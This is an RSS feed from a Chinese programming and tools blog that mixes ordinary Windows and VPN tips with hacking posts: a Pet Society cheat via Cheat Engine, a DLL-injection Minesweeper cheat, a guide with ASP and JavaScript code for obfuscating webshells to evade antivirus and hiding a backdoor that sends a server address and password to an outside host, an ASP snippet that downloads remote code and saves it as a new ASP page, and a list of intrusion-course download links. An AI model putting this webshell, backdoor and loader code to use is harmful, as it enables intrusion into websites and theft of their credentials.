<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>MK2-风 之谷 - 实用工具</title><link>http://www.mk2leo.com/</link><description>大家来学习编程吧 - </description><generator>RainbowSoft Studio Z-Blog 1.8 Arwen Build 90619</generator><language>zh-CN</language><copyright>MK2-风版权所有.</copyright><pubDate>Tue, 07 Sep 2010 11:36:48 +0800</pubDate><item><title>WIN 7 移除有问题的驱动 </title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/194.html</link><pubDate>Wed, 18 Aug 2010 23:39:53 +0800</pubDate><guid>http://www.mk2leo.com/post/194.html</guid><description><![CDATA[<p>如何移除Win7中老旧不再使用的设备驱动，你发现一些最近安装的设备工作不正常或者经常引起电脑死机，怎么删除Windows7中旧的或者未使用的设备驱动呢？</p><p><strong>Just do it：</strong></p><p>1、右键Win7桌面的&ldquo;计算机&rdquo;，选择&ldquo;属性&rdquo;。</p><p>2、在左侧面板上找到&ldquo;高级设置&rdquo;，点击&ldquo;高级&rdquo;选项卡底部的&ldquo;环境变量&rdquo;。</p><p>3、在上半部分的&ldquo;XX的用户变量&rdquo;那里点击&ldquo;新建&rdquo;</p><p>输入变量名：devmgr_show_nonpresent_devices</p><p>输入变量值：1</p><p>确定，确定，再确定！</p><p><img alt="" src="http://www.2wpc.com/uploads/allimg/c100426/12H293560410-35T7.jpg" /></p><p>4、右键桌面的&ldquo;计算机&rdquo;，选择&ldquo;管理&rdquo;，在左侧打开&ldquo;设备管理器&rdquo;。</p><p>5、在设备管理器的顶部菜单栏，选择&ldquo;查看&rdquo;&mdash;&mdash;&ldquo;显示隐藏的设备&rdquo;。</p><p>6、so 你可以在设备管理器的右边，找到&ldquo;其他设备&rdquo;。</p><p>7、右键不使用的&ldquo;未知设备&rdquo;，卸载它吧！</p><p><img alt="" src="http://www.2wpc.com/uploads/allimg/c100426/12H293561150-452T.jpg" /></p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/194.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=194</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=194&amp;key=eb60e7e5</trackback:ping></item><item><title>POI照片上傳定位網站 gps</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/190.html</link><pubDate>Wed, 03 Mar 2010 00:33:15 +0800</pubDate><guid>http://www.mk2leo.com/post/190.html</guid><description><![CDATA[<p>&nbsp;http://www.panoramio.com</p><p>終於找到可以讀取acer poi模式拍出來的照片gps位置了..</p><p>大家用poi模式拍了.可以上傳到網站.會在google maps中顯示該圖片拍攝位置..</p><p>&nbsp;</p><p><img onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/77777.jpg" alt="" title="" /></p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/190.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=190</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=190&amp;key=87ebc3fa</trackback:ping></item><item><title>在電腦上也可以玩google maps buzz 能看到地圖玩</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/189.html</link><pubDate>Tue, 02 Mar 2010 20:03:57 +0800</pubDate><guid>http://www.mk2leo.com/post/189.html</guid><description><![CDATA[<p>&nbsp;<a href="http://www.google.com/ig/adde?moduleurl=iksu.mysites.com/get_file/buzz/googlebuzz-1.xml">http://www.google.com/ig/adde?moduleurl=iksu.mysites.com/get_file/buzz/googlebuzz-1.xml</a></p><p>一定要使用\</p><p>Google Chrome 瀏覽器..安裝了插件後..就能在igoogle首頁中顯示..</p><p>玩法跟用手機差一樣..可以在地圖中看到buzz用戶...</p><p>&nbsp;</p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/88.jpg" /></p><p>&nbsp;</p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/66.jpg" /></p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/344.jpg" /></p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/999.jpg" /></p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/189.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=189</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=189&amp;key=85fa52b4</trackback:ping></item><item><title>Pet Society Automatic injection Race 2000 coin </title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/177.html</link><pubDate>Thu, 05 Nov 2009 19:45:29 +0800</pubDate><guid>http://www.mk2leo.com/post/177.html</guid><description><![CDATA[<object height="344" width="425"><param value="http://www.youtube.com/v/Hgmbw4WRvm4&amp;hl=en&amp;fs=1&amp;" name="movie" /><param value="true" name="allowFullScreen" /><param value="always" name="allowscriptaccess" /><embed height="344" src="http://www.youtube.com/v/Hgmbw4WRvm4&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" width="425" allowfullscreen="true" allowscriptaccess="always"></embed></object><p>&nbsp;</p><p><a target="_blank" href="http://www.mk2leo.com/upload/RaceCoin.rar">RaceCoin.rar</a></p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/177.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=177</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=177&amp;key=80915b44</trackback:ping></item><item><title>pet society 賽跑必勝2000金幣 2009/10//11 </title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/176.html</link><pubDate>Mon, 12 Oct 2009 02:34:48 +0800</pubDate><guid>http://www.mk2leo.com/post/176.html</guid><description><![CDATA[<p>呢個bet 同普通1000 bet 分別不大<br />但就+ 左必勝法同埋係 + 2000 蚊, 仲要係只scan 一個code<br />1)去跑步埸, 揀人bet, tick, 唔好禁ready<br />2)開ce, 揀browser, hex, 8b, asrom<br />3)scan 5D8B00000652840F<br />4)出現一個address 後右click &gt; dissable.......@##%%^<br />5)已highlight 果一行右click, go to address<br />6)copy 彈出黎ge address, paste 去patiniox 個網個gen code 器<br /><a href="http://patiniox.blogspot.com/2009/10/ps-carreracoin-hack-by-patiniox.html" target="_blank">http://patiniox.blogspot.com/200 ... ck-by-patiniox.html</a><br />7)gen code 後, 關左address 個window 仔, 禁<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=tools">tools</span> &gt; auto......#$%^#&amp;<br />8)excute&gt; yes&gt;ok~~~ 跟住去跑就ok 啦<br /><br /><br />Requerimientos: Requirements:<br />- <span class="t_tag" onclick="tagshow(event)" href="tag.php?name=Cheat">Cheat</span> <span class="t_tag" onclick="tagshow(event)" href="tag.php?name=engine">engine</span> 5.5 - Cheat Engine 5.5<br />- Firefox o Flock browser - Firefox or Flock browser<br />- Adobe <span class="t_tag" onclick="tagshow(event)" href="tag.php?name=flash">flash</span> player 9 - Adobe flash player 9<br /><embed src="http://www.youtube.com/v/tlPt6OKIx9E&amp;hl=zh_TW&amp;fs=1" width="425" height="344" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always"></embed></p><p>&nbsp;</p><p>再加上加速器3倍速和自動按鍵精靈腳本..全自動掛一天可以上百萬...mk2-風&nbsp; 有興趣者可以加我msn或facebook 交流 mk2leo@qq.com</p><p><br />&nbsp;</p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/176.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=176</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=176&amp;key=e0ba3b06</trackback:ping></item><item><title>扫雷游戏作弊器：内挂制作基本思路 </title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/174.html</link><pubDate>Wed, 07 Oct 2009 23:12:12 +0800</pubDate><guid>http://www.mk2leo.com/post/174.html</guid><description><![CDATA[<p>&nbsp;</p><p>原文地址 <a href="http://www.cppblog.com/zyzx/archive/2009/08/07/81239.html">http://www.cppblog.com/zyzx/archive/2009/08/07/81239.html</a></p><p>tag：C，扫雷游戏，vc内联汇编，远程线程(RemoteThread.)<br /><br />/* Create by zyzx<br />* Created 2008-08-19<br />* Modified 2008-08-19<br />*/<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NND，想把整个工程和文件都上传到百度相册内都不行。将rar文件更改后缀名，上传相册时，居然还检查上传文件真正的格式（NND，百度工作人员在这里咋不偷懒呢？？？）。。。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 压缩包捆绑在Jpg文件中，在Code_source相册中 --&gt;&gt;<a href="http://hi.baidu.com/seemin/album/item/1d84c7ede8c88bcdb21cb162.html" target="_blank">这里下载</a><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个是刚毕业无聊时，做的小玩意。。麻雀虽小，五脏俱全啊。。有些技术广泛用于外挂，杀毒，安全，病毒等等方面。。本文仅研究学习之用 ，勿用于非法。。。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 外挂制作就技术含量而言，分几个档次。内挂是仅次于脱机外挂（两种都是最难的），当然这两种挂的用途不一样，各有各的&ldquo;钱途&rdquo;和&ldquo;市场&rdquo;。通常做外挂需要的几个部分为：分析游戏通讯协议包，逆向游戏客户端，提取客户端重要数据结构和可用的功能函数；再就是程序员的事情了，跟据前面提供的资料编码制作外挂（作弊器）。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 内挂制作的基本原理是：1、使得内挂程序（可能是dll）和目标游戏处于同一个进程空间。2、在目标游戏进程中创建一个线程（或多个）来执行相关功能。3、伪造参数，配平堆栈，（汇编级别）直接跳转游戏功能函数模块（能跳转的条件是必须处于同一个进程空间，是进程中哪个线程则来执行是无所谓的）。<br /><br />如下是扫雷游戏的全部代码：测试平台 Window Xp + 扫雷 + vc<br /><br />DLL端代码：生成插入扫雷游戏的DLL<br />&nbsp;</p><div forimg="1" align="left"><a href="http://hiphotos.baidu.com/seemin/pic/item/e04f132f538152201f3089b7.jpg" target="_blank"><div forimg="1" align="center"><img height="3347" alt="SaoleiHideDllCpp.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/SaoleiHideDllCpp.png" width="1167" border="0" /></div></a><br /><br />主程序代码：结构定义文件</div><div forimg="1" align="center"><img height="613" alt="MYMINE_H_.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/MYMINE_H_.png" width="1021" border="0" /></div><p><br />主应用程序：Dlg文件<br />&nbsp;</p><div forimg="1" align="center"><img height="4429" alt="扫雷高手DlgCpp.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/扫雷高手DlgCpp.png" width="1079" border="0" /></div><p><br /><br />用于远程插入DLL的代码：<br />&nbsp;</p><div forimg="1" align="center"><img height="3875" alt="Injectorcpp.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/Injectorcpp.png" width="988" border="0" /></div><p><br /><br />如下是逆向扫雷程序分析得到的特征码：<br />&nbsp;</p><div forimg="1" align="center"><img height="4293" alt="扫雷游戏特征码分析.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/扫雷游戏特征码分析.png" width="1108" border="0" /></div><p><br /><br /><br />运行的实例：（扫雷的两图不是同一次运行的）<br />&nbsp;</p><div forimg="1" align="left"><img height="186" alt="扫雷作弊器主程序.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/扫雷作弊器主程序.png" width="424" border="0" /></div><p><br />&nbsp;</p><div forimg="1" align="left"><img height="363" alt="标记雷区.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/标记雷区.png" width="506" border="0" /></div><p><br />&nbsp;</p><div forimg="1" align="left"><img height="363" alt="开始扫雷.png" src="http://www.cppblog.com/images/cppblog_com/zyzx/扫雷游戏/开始扫雷.png" width="506" border="0" /></div>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/174.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=174</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=174&amp;key=447cc304</trackback:ping></item><item><title>windows xp設定vpn server</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/172.html</link><pubDate>Sun, 04 Oct 2009 21:20:42 +0800</pubDate><guid>http://www.mk2leo.com/post/172.html</guid><description><![CDATA[<p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129933.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129937.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129941.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129944.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129947.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129950.jpg" />这里什么都不用选.直接下一步</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129953.jpg" /></p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129956.jpg" />这里要点选内容.设定固定IP</p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129959.jpg" />设定的IP要跟SERVER端 路由器的IP.是同一网段 192.168.2.XXX 这样外接入来的.才能分配到同一网段的IP.成功上网</p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,450)" src="http://www.mk2leo.com/upload/1214129962.jpg" /></p><p>&nbsp;<font face="PMingLiu" size="3">防火牆的部份，無論是開啟哪個部份的防火牆，都必須開啟這四個port 1723、500、50、51給予對應vpn server所用的ip。這部份若沒有處理，會讓client無法連上server。</font><br />&nbsp;</p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/172.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=172</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=172&amp;key=21e90d75</trackback:ping></item><item><title>加密你的大马</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/139.html</link><pubDate>Fri, 17 Apr 2009 03:46:17 +0800</pubDate><guid>http://www.mk2leo.com/post/139.html</guid><description><![CDATA[<p>大家在<a class="channel_keylink" href="http://www.nzhack.net/" target="_blank">入侵</a>中应该是捡到过别人的Webshell吧?也许有的大马功能很好，于是你就用了，但是你没想过该马可能有<a class="channel_keylink" href="http://www.nzhack.net/" target="_blank">后门</a>?现在很多的大马都加密了，打开时候一片乱码，是不是也想加密自己的大马了，加密后的Webshell不仅可以防止别人捡我们的Shell用，还能免杀webshell。ASP<a class="channel_keylink" href="http://www.nzhack.net/" target="_blank">木马</a>加密不难，让我们一起踏上大马加密之旅。 <br />　　一:人工加密<br /><br />　　1.主加密函数的编写<br /><br />　　1)主解密与解密函数<br /><br />　　对大马的加密关键是编写我们的加密函数，然后写出相应的解密函数。我这里先得对几个ASP自带函数有个了解<br /><br />　　CHR：将ASCII 字码转换成字符<br /><br />　　REPLACE:将一个字符串取代 部份字。<br /><br />　　ASC：将字符串的第一字母转换成 ANSI (美国国家标准符号)字码。<br /><br />　　Len：取得字符串的长度。<br /><br />　　然后对IF语句和一些VBS函数相关知识有个了解。大家有不懂可以查看Windows脚本技术，里面比较详细。<br /><br />　　我们先看下一个最常用的解密函数吧。<br /><br />dim ShiSan,ShiSanNewstr,ShiSanI<br />Function ShiSanFun(ShiSanObjstr)<br />ShiSanObjstr = Replace(ShiSanObjstr, &quot;╁&quot;, &quot;&quot;&quot;&quot;)<br />For ShiSanI = 1 To Len(ShiSanObjstr)<br />If Mid(ShiSanObjstr, ShiSanI, 1) &lt;&gt; &quot;╋&quot; Then<br />&nbsp; ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) &amp; ShiSanNewStr<br />Else<br />&nbsp; ShiSanNewStr = vbCrLf &amp; ShiSanNewStr<br />End If<br />Next<br />ShiSanFun = ShiSanNewStr<br />End Function<br /><br /><br />　　这个解密函数就是将加密后的代码解密。他先将解密代码(Str)中的╁换为引号(&quot;)，得到Str1,然后通过FOR循环，将加密部分(Str1)逐个取出，将取出的字符倒叙连接成一个新字符，并将╋换为vbcrlf(换行符)。这个加密函数应用的相当广泛，就连华夏免杀Webshell也用了这个函数<br /><br />　　好了。知道加密的原理后我们就可以编写自己的加密函数了。ASP的加密函数只需要将上面的部分稍微改下，但是需要可以执行的环境(本地IIS或上传到服务器)。这里我给出了JS+HTML写的加密网页<br /><br />　　----------&gt;JS+HTML加密：<br /><br />&lt;html&gt;<br />&lt;script script=&quot;JavaScript&quot;&gt;<br />function enCode(theText)<br />{<br />output=new String;<br />TextSize=theText.length;<br />for (i = 0; i &lt; TextSize; i++)<br />{<br />&nbsp; if(theText.charCodeAt(i)==&quot;13&quot;)<br />&nbsp; {<br />&nbsp; output=&quot;鹏&quot;+output;<br />&nbsp; }<br />&nbsp; else if(theText.charCodeAt(i)==&quot;10&quot;)<br />&nbsp; {<br />&nbsp; output+=&quot;&quot;;<br />&nbsp; }<br />&nbsp; else<br />&nbsp; {<br />&nbsp; output=theText.charAt(i)+output;<br />&nbsp; }<br />}<br />return output<br />}<br />&lt;/script&gt;<br />&lt;form name=encform /&gt;<br />&lt;textarea name=box1 rows=16 cols=120&gt;&lt;/textarea&gt;<br />&lt;br /&gt;<br />&lt;input type=button value=&quot;加密到下面文本框&quot; /&gt;&lt;br /&gt;<br />&lt;textarea name=box2 rows=16 cols=120&gt;&lt;/textarea&gt;<br />&lt;/form&gt;<br />&lt;/form&gt;<br />&lt;/html&gt; <br />保存为html格式然后用IE打开，将需要加密的部分填写上，然后点击按钮&quot;加密到下面文本框&quot; ，就可以得到加密后的字符串了。 <br />　　上面的加密函数是enCode,他的作用是将ASP代码(Code)中的换行换为鹏，得到Code1，然后将Code1倒序(13和10分别是回车和换行的编码)。比如：<br /><br />　　Sub RRS(str)<br /><br />　　response.write(str)<br /><br />　　End Sub<br /><br />　　加密后就为<br /><br />　　buS dnE鹏)rts(etirw.esnopser 鹏)rts(SRR buS<br /><br />　　写了加密函数后就要写出对于的解密函数，必须用ASP编写<br /><br />dim psEncode,psStr,psI<br />Function unCode(psEncode)<br />For psI=1 To Len(psEncode)<br />If Mid(psEncode,psI,1)&lt;&gt;&quot;鹏&quot; Then<br />psNewStr=Mid(psEncode,psI,1)&amp;psNewStr<br />Else<br />psNewStr=vbCrlf&amp;psNewStr<br />End If<br />Next<br />unCode=psNewStr<br />End Function <br /><br />　　这样我们就可以将ASP中的RRS函数用<br /><br />　　execute(unCode(&quot;buS dnE鹏)rts(etirw.esnopser 鹏)rts(SRR buS&quot;))<br /><br />　　代替掉<br /><br />　　Sub RRS(str)<br /><br />　　response.write(str)<br /><br />　　End Sub<br /><br />　　我们可以利用这个加密函数加密多处，这样多加密一般可以免杀大马<br /><br />　　(2)加密解密函数<br /><br />　　直接调用解密函数，很容易使自己的解密函数泄露，我们可以利用一个函数来加密我们的加密函数，这样就难找一点了，这主要是为了保护我们的马，对于上面我们的解密函数，我们可以再写一个加密函数，然后调用execute来，这样就可以隐藏我们的解密函数了。这样我们解密函数的源代码就不会明文出现在webshell里了<br /><br />　　(3)嵌套加密<br /><br />　　我们可以在主加密函数里面嵌套次加密函数，不过这样我们需要对应的写出多个解密函数，这样加密比较侧地，小破孩就马就是采用这种加密方法。由于方法相同，我就不多啰嗦了，大家有兴趣可以自己去研究下幽月或小破孩的，我这里有源码，想要的可以到我博客(hi.baidu.com/novaa)<br /><br />　　2.密码的加密<br /><br />　　大家是否遇见过webshell的密码是很长的数字，20多位或30多位。这就是对密码加密了的，通过对密码加密，可以防止别人通过查看我们的源代码得到我们的密码，除非他完全解密了我们的webshell，否则我们大马就是安全的。这里看一个对密码加密的函数。<br /><br />Function enPass(psStr,Pos)<br />Dim i,psNewStr<br />For i = 1 To Len(psStr)<br />psNewStr= psNewStr&amp; Asc(Mid(psStr, i, 1))+Pos &amp; (20080808-Pos)<br />Next<br />enPass =psNewStr<br />End Function <br /><br />　　<br /><br />　　上面的这个加密函数是对每一位密码的数字取ascii码，然后加上Pos &amp; (20080808-Pos)&amp;i，这里注意&amp;是连接字符，比如n&amp;ov&amp;aa结果是novaa<br /><br />　　然后我们把解密后的部分定义为UserPass<br /><br />　　然后在验证的地方通过<br /><br />　　enPass(request.form(&quot;pass&quot;),pn)=UserPass 来进行身份验证，当然，通过修改密码的验证方式可以轻松的修改密码，但是前提是你已经完全解密了这个webshell了。<br /><br />　　3.<a class="channel_keylink" href="http://www.nzhack.net/" target="_blank">后门</a>的隐藏技术<br /><br />　　怎么隐藏<a class="channel_keylink" href="http://www.nzhack.net/" target="_blank">后门</a>?其实主要就利用ASP的自带函数和一些其他技巧，这里我以破小孩后门来解释<br /><br />RRS&quot;&lt;DIV style=&quot;&quot;CURSOR:url('http://&quot;&amp;chr(37)&amp;&quot;77&quot;&amp;chr(37)&amp;&quot;2E%31&quot;&amp;chr(39-pos)&amp;&quot;&quot;&amp;(4+pos)&amp;&quot;c%6c&quot;&amp;chr(37)&amp;&quot;34%2E&quot;&amp;chr(37)&amp;&quot;63%6f&quot;&amp;chr(37)&amp;&quot;6d/%&quot;&amp;(36+pos)&amp;&quot;%2f?%75=&quot;&amp;Serveru&amp;&quot;&amp;%70=&quot;&amp;UserPass&amp;&quot;')&quot;&quot;&gt;&quot;<br />这个和幽月的后门隐藏技术差不多，都是利用了ASCII编码和HTML编码，CHR(37)是&quot;/&quot;,我们把它还原就是<br /><font color="#2f5fa1">http://w.1ll4.com/8/?u=</font>&quot;&amp;Serveru&amp;&quot;&amp;p=&quot;&amp;UserPass&amp;&quot;<br />这里我们可以做的更隐蔽些。<br /><br />　　1.我们查找后门的时候一般是利用查找有UserPass的地方，因此，我们可以利用enPass(request.form(&quot;pass&quot;),pn)赋值给另一个变量canyou，然后把&amp;p=&quot;&amp;UserPass&amp;&quot;换为&amp;p=&quot;&amp;canyou&amp;&quot;<br /><br />　　2.我们可以利用webshell里面自带的常量来代替http，以为http也是经常用来找后门的地方，比如Sot(13,0) = &quot;Microsoft.XMLHTTP&quot;这里就有HTTP，我们利用Right函数来取得Sot(13,0) 右边的4个字符，然后代替后门中的HTTP<br /><br />　　二:工具加密<br /><br />　　利用微软的脚本加密工具screnc.exe对我们初步加密的webshell进行再次的加密，这样我们的webshell就完全成了一堆乱码了<br /><br />　　有了上面的加密知识，相信大家很快可以掌握ASP的解密，方法都是一样的，然后大家就可以玩玩除后门了</p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/139.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=139</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=139&amp;key=b2e09a44</trackback:ping></item><item><title>破ASP网马监控软件代码</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/138.html</link><pubDate>Fri, 17 Apr 2009 03:33:02 +0800</pubDate><guid>http://www.mk2leo.com/post/138.html</guid><description><![CDATA[<div id="textstyle_1" style="font-size: 9pt; overflow: hidden; word-break: break-all; text-indent: 24px; word-wrap: break-word"><p><font style="background-color: #ffffff" face="Verdana">&lt;%<br />Set xPost = CreateObject(&quot;Microsoft.XMLHTTP&quot;)<br />xPost.Open &quot;GET&quot;,&quot;http://www.dingxin-hn.com/admin/Databackup/1.txt&quot;,False<br />xPost.Send()<br />Set sGet = CreateObject(&quot;ADODB.Stream&quot;)<br />sGet.Mode = 3<br />sGet.Type = 1<br />sGet.Open()<br />sGet.Write(xPost.responseBody)<br />sGet.SaveToFile Server.MapPath(&quot;999.asp&quot;),2<br />set sGet = nothing<br />set sPOST = nothing<br />%&gt;</font></p><p><font style="background-color: #ffffff" face="Verdana">&nbsp; 这代码利用 一个组件。。 读取从另一个服务器TXT文件的ASP代码&nbsp; 再下载TXT里的代码到服务器里面</font></p><p><font style="background-color: #ffffff" face="Verdana">&nbsp;&nbsp; 在保存为999。ASP&nbsp;&nbsp;&nbsp; 就是远程调用代码。。再下载到自己的服务器里&nbsp; 把TXT代码内容变成ASP<br />&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 可以做后门&nbsp;&nbsp;&nbsp; </font></p></div><p><br />&nbsp;</p>]]></description><category>实用工具</category><comments>http://www.mk2leo.com/post/138.html#comment</comments><wfw:comment>http://www.mk2leo.com/</wfw:comment><wfw:commentRss>http://www.mk2leo.com/feed.asp?cmt=138</wfw:commentRss><trackback:ping>http://www.mk2leo.com/cmd.asp?act=tb&amp;id=138&amp;key=3007268d</trackback:ping></item><item><title>网页 提权 入侵精华</title><author>mk2leo@qq.com (leoling504)</author><link>http://www.mk2leo.com/post/135.html</link><pubDate>Wed, 15 Apr 2009 23:13:14 +0800</pubDate><guid>http://www.mk2leo.com/post/135.html</guid><description><![CDATA[<p>第一课 网站入侵概述 <br /><a id="url_1" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq01.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq01.rar</font></a>&nbsp;&nbsp; <br />第二课 常见网站入侵软件介绍和使用&nbsp;&nbsp; <br /><a id="url_2" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq02.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq02.rar</font></a>&nbsp;&nbsp; <br />第三课 数据库备份技术详解(实例演示)&nbsp;&nbsp; <br /><a id="url_3" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq03.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq03.rar</font></a> <br />第四课 抓包改包入侵网站(实例演示) <br /><a id="url_4" onclick="return checkUrl(this)" onmouseout="" href="http://www.hx95.com/20081115/jbrq04.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq04.rar</font></a>&nbsp;&nbsp; <br />第五课 一句话木马2种方法入侵网站(实例演示) <br /><a id="url_5" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq05.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq05.rar</font></a><br />第六课 Cookie欺骗的简单讲解+利用实例&nbsp;&nbsp; <br /><a id="url_6" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq06.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq06.rar</font></a> <br />第七课 .asp解分漏洞实战入侵 NZ<br /><a id="url_7" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq07.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq07.rar</font></a> <br />第八课 旁注入侵思路及条件 <br /><a id="url_8" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq08.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq08.rar</font></a> <br />第九课 啊D+google获得大量注入点 <br /><a id="url_9" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq09.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq09.rar</font></a> <br />第十课 数据库恢复技术入侵网站 <br /><a id="url_10" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq10.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq10.rar</font></a>&nbsp;&nbsp; <br />第十一课 ewebeditor编辑器漏洞入侵 <br /><a id="url_11" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq11.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq11.rar</font></a>&nbsp;&nbsp; <br />第十二课 巧妙利用漏洞入侵科讯网站 <br /><a id="url_12" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/jbrq12.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/jbrq12.rar</font></a> <br /><br />提权入侵班 <br />讲师：阳光 <br />************************************************* <br />第一课 提权概述<br /><a id="url_13" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq01.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq01.rar</font></a> <br />第二课 serv-u服务器提权（目录无修改权限） <br /><a id="url_14" onclick="return checkUrl(this)" href="http://www.hx95.com/20081115/tqrq02.rar" target="_blank"><font color="#0070af">http://www.hx95.com/20081115/tqrq02.rar</font></a> <br />第三课 